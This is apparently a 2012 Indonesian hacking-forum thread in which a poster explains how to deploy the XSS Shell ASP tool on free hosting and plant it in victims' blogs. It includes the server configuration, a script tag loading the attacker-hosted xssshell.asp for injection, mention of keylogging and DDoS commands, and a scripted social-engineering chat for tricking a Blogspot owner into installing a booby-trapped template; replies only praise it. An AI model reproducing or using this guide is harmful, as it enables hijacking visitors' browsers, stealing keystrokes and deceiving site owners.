[SHARE] XSS Tunelling Soceng

**czeroo_cool** · 11-08-2012, 08:26 AM

Di thread sebelumnya ada tentang XSS di Blogspot, kali ini saya ingin berbagi XSS Tunneling dengan menggunakan social engineering.

Pertama kita download dulu source nya di sini

Kemudian kita cari hosting gratisan #gakpunyaduit yang support dengan asp, kenapa asp ? karena source yang kita download diatas berbasis asp.

Setelah itu, di folder xss tunneling nya tadi yang sudah di download, buka xssshell.asp .. lalu kita modifikasi sourcenya di bagian ini

Code:
// You XSSShell Server var SERVER = "http://users11.jabry.com/testq/";

disini saya menggunakan webhosting jabry.net so http://users11.jabry.com/testq adalah alamat host saya.

Kemudian, buka folder admin, edit file db.asp
modifikasi sourcenya dibagian

Code:
'// DATABASE CONFIGURATION

Const DBPATH = "D:\content\users11\testq\db\shell.mdb"

untuk mengetahui lokasi/pathnya, upload file berekstensi .asp ke webhostingnya dengan code

Code:
<%

Response.Write Server.MapPath(".")

%>

sebagai contoh saya kasih nama file ini output.asp, lalu saya upload ke direktori web saya, dan saya akses http://users2.jabry.com/net4pi/output.asp

[Image: 536841_3706291984004_1086656751_n.jpg]

[Image: 536841_3706291984004_1086656751_n.jpg]

gambar diatas menunjukkan lokasi database saya. copy paste response setelah kita akses output.asp kedalam db.asp dibagian DATABASE CONFIGURATION nya.

Setelah itu, upload semua file nya ke directory webhosting, kemudian coba akses url admin nya, dalam hal ini url saya adalah http://users11.jabry.com/testq/admin

Quote:secara default password adalah w00t , untuk merubahnya edit nya di db.asp tadi

di admin inilah banyak perintah yang bisa kita jalankan seperti keylogging, ddos, prompt , alert dll.

[Image: 483035_3706292264011_648639154_n.jpg]

Lalu bagaimana dengan victim ?
kita hanya perlu menginject kan code seperti ini

Code:
<script src="http://users11.jabry.com/testq/xssshell.asp"></script>

kedalam web victim.

Setelah kode tersebut berhasil masuk ke source page nya victim, kita akses lagi admin kita tadi, nanti disitu ada list victim seperti berikut

Terus socengnya dimana mas ? Soceng nya gini broo..
kita download template gratisan di internet , terus kita modifikasi, kita masukkan tuh script diatas di template itu. Lalu kita bilang deh ke victim

Quote:A : Bro, lu pake blogspot tampilannya jelek amat, di bagusin dikit ngapa bro, biar pengunjung betah di blog ente
B : Cara bagusin nya gimana bro ? Ane gak bisa bahasa pemrograman web ?????
A : Gampang bro, gak usah repot. Pake template ane aja bro.. Nih .. Download disini
B : Weeehh makasih ya bro.. ta pasang dulu...
beberapa menit kemudian
B : Bro, template nya bagus... Mantab...Tanks broo
A : Yoi broo.. sama sama... (Dalam hati ngakakaaaak) =)) :-

[Image: 544867_3706293544043_349243631_n.jpg]

Kalo repost di Delete aja om, Kalo salah kamar maaf ya.. Member Baru Confused

:-

**xsan-lahci** · 11-08-2012, 08:58 AM

weeew

keduluan lagi wakakak keren bro Smile

**czeroo_cool** · 11-08-2012, 09:35 AM

(11-08-2012, 08:58 AM)xsan-lahci Wrote: weeew keduluan lagi wakakak keren bro

Hehhe.. maaf kaka \m/
kalo ada yang salah koreksi nya om Smile

**Al - Ayyubi** · 11-08-2012, 09:48 AM

keren om:-bd
trimakasih om Ts untuk tutornya :-bd

**czeroo_cool** · 11-08-2012, 10:06 AM

(11-08-2012, 09:48 AM)Al - Ayyubi Wrote: keren om:-bd
trimakasih om Ts untuk tutornya :-bd

Om Ayubi, saya pengen ikut FWB , saya di region Jogja. Mohon bantuannya

**xsan-lahci** · 11-08-2012, 10:40 AM

hehe +1 dari ane om Smile

**czeroo_cool** · 11-08-2012, 11:46 AM

(11-08-2012, 10:40 AM)xsan-lahci Wrote: hehe +1 dari ane om

Thanks om.. jadi ada Ijo nya deh.. Hehehe Smile

:- :-bd

**xsan-lahci** · 11-08-2012, 11:54 AM

share terus bro Smile

**czeroo_cool** · 11-08-2012, 02:28 PM

(11-08-2012, 11:54 AM)xsan-lahci Wrote: share terus bro

Siap om.. Saling berbagi Smile

**babelcorner** · 11-08-2012, 02:55 PM

:-bd keren :-bd
xss mang masih keren ampe sekarang Smile

:-